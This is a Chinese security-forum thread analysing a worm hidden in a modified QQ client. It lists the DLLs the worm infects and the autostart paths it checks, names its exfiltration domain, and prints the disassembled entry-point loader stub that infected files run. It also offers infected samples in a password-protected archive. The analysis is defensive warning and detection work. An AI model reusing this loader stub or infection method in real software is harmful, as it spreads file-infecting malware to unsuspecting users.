查看: 23185|回复: 74
收起左侧

[病毒样本] Worm.Spawn.SaiBo-赛博QQ感染众多软件[高危]{更新,添加专杀工具}

  [复制链接]
Hmilypojie
头像被屏蔽
发表于 2010-4-22 11:38:25 | 显示全部楼层 |阅读模式
本帖最后由 Hmilypojie 于 2010-4-23 17:28 编辑

赛博QQ可能很多人用,它拥有可以显示好友ip等功能,但是附加了很多垃圾,比如锁定用户主页,更不为人知的是它还是一个蠕虫,会感染你常用的软件,防止用户删除,生成C:\WINDOWS\system32\bserveth.dat这个文件,将用户数据发送到指定网站hxxt://support.hao8684.cn


目前没有几款杀软能查杀被感染的文件,所以把样本提供上来

Worm.Spawn.SaiBo 从感染程序里看出作者编写源码的路径是:d:\Program\Soho\Worm\Spawn\Release\spawn.pdb,从而我借助作者的信息, 我给它命了这个名.


赛博QQ主要会感染以下文件:

ttpcomm.dll 千千静听

BasicCtrlDll.dll QQ

Program\BHOStub.dll 迅雷

mps.dll 暴风影音

uibrowser.dll 阿里旺旺

uxcontacts.dll MSN

AvatarX.ocx 飞信
  1. SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  2. \Microsoft\Internet Explorer\Quick Launch
复制代码
赛博QQ启动后会向Explorer.exe注入代码执行,Explorer.exe此时就会通过上面的启动项和路径判断是否有上述文件,如果有就会去感染这些文件,从文件中就可以清楚的看到被感染的文件都是一些常用的软件,所以一般用户很难清除木马,怎么判断你是否被感染了?一个简单的办法,如果你装了赛博QQ,你可以看看你QQ目录下的BasicCtrlDll.dll文件数字签名是否正常,如果不正常,那么就危险了,再看看被感染文件的代码,也很容易看出被感染了,由于之前我为了去除赛博QQ的主页锁定的广告功能,调试过赛博QQ的主程序DLL,很了解它程序解码、反调试和代码风格等,被感染文件入口代码如下:
  1. 100AF400 > $  8B4424 08        mov eax,dword ptr ss:[esp+8]                     ;  被感染文件入口点
  2. 100AF404   .  3C 01            cmp al,1
  3. 100AF406   .  74 04            je short mps.100AF40C
  4. 100AF408   .  3C 05            cmp al,5
  5. 100AF40A   .  7C 52            jl short mps.100AF45E
  6. 100AF40C   >  56               push esi
  7. 100AF40D   .  57               push edi
  8. 100AF40E   .  E8 02000000      call mps.100AF415
  9. 100AF413   .  CC               int3
  10. 100AF414   .  CC               int3
  11. 100AF415   $  5E               pop esi
  12. 100AF416   .  8D86 D91B0700    lea eax,dword ptr ds:[esi+71BD9]
  13. 100AF41C   .  50               push eax
  14. 100AF41D   .  8B86 510D0000    mov eax,dword ptr ds:[esi+D51]
  15. 100AF423   .  FFD0             call eax                                         ;  kernel32.GetModuleHandleA
  16. 100AF425   .  8D8E C51B0700    lea ecx,dword ptr ds:[esi+71BC5]
  17. 100AF42B   .  51               push ecx
  18. 100AF42C   .  50               push eax
  19. 100AF42D   .  8B86 450D0000    mov eax,dword ptr ds:[esi+D45]
  20. 100AF433   .  FFD0             call eax                                         ;  kernel32.GetProcAddress
  21. 100AF435   .  85C0             test eax,eax
  22. 100AF437   .  74 25            je short mps.100AF45E
  23. 100AF439   .  BF 00700100      mov edi,17000
  24. 100AF43E   .  6A 40            push 40
  25. 100AF440   .  68 00100000      push 1000
  26. 100AF445   .  57               push edi
  27. 100AF446   .  6A 00            push 0
  28. 100AF448   .  FFD0             call eax                                         ;  kernel32.VirtualAlloc
  29. 100AF44A   .  85C0             test eax,eax
  30. 100AF44C   .^ 74 86            je short mps.100AF3D4
  31. 100AF44E   .  8BCF             mov ecx,edi
  32. 100AF450   .  8BF8             mov edi,eax
  33. 100AF452   .  8DB6 EDAB0500    lea esi,dword ptr ds:[esi+5ABED]
  34. 100AF458   .  F3:A4            rep movs byte ptr es:[edi],byte ptr ds:[esi]
  35. 100AF45A   .  FFD0             call eax                                         ;  跳向木马的执行代码
  36. 100AF45C   .  5F               pop edi
  37. 100AF45D   .  5E               pop esi
  38. 100AF45E   >^ E9 2273FFFF      jmp mps.100A6785                                 ;  跳向程序原始入口点
复制代码
从入口感染代码很容易看出,被感染的文件入口会先执行一段上面的代码,用来执行感染程序的dll
  1. 100AF45A   .  FFD0             call eax
复制代码
从这里进去以后,如果你跟踪过赛博主程序的dll,你会很容易跟踪出来解码的代码和风格和赛博主程序dll是完全相同的,感染方式比较简单,修改入口代码,增加程序最后一个区段大小用来写入感染代码,具体的过程不在赘述,有兴趣的同学可以详细跟踪下,如果你被感染了,可以先删除上面所有可能被感染的文件,重装即可,欢迎大家指出错误发表自己的见解,也希望各大厂商能尽快查杀此蠕虫!

附件中包含了几个被感染的程序和一个我提取出来的病毒执行代码的关键DLL
压缩包解压密码:52pojie

       

专杀工具:

From:
         LCG
     吾爱破解论坛
http://www.52pojie.cn

评分

参与人数 3经验 +15 人气 +2 收起 理由
yjwfdc + 1 只用官方版本。
单身熟男 + 1 厉害。。
Sherry.ai + 15 加分鼓励

查看全部评分

ximo
发表于 2010-4-22 11:40:06 | 显示全部楼层
沙发,123456
白羊座
发表于 2010-4-22 11:41:18 | 显示全部楼层
板凳,顶大H
1983xiao1983
发表于 2010-4-22 11:44:53 | 显示全部楼层
晕,正在用赛博
小哀带着刀
发表于 2010-4-22 11:46:33 | 显示全部楼层
不理解,现在这个也搞流氓了................
juhone
发表于 2010-4-22 11:49:20 | 显示全部楼层
赛博的流氓 我早就不用了
fatezero
发表于 2010-4-22 12:07:15 | 显示全部楼层
本帖最后由 fatezero 于 2010-5-7 14:52 编辑

流氓
tianyayulin
发表于 2010-4-22 12:30:36 | 显示全部楼层
to jiangmin and kingsoft
kaibuliaokou
头像被屏蔽
发表于 2010-4-22 12:35:05 | 显示全部楼层
修改版的QQ或者是其他修改过的软件,最好还是别用了··
悲剧啊
天使的愤怒
发表于 2010-4-22 13:03:23 | 显示全部楼层
ESET NOD32 4.2.X已报毒。无需上报~
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-25 10:12 , Processed in 0.126011 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表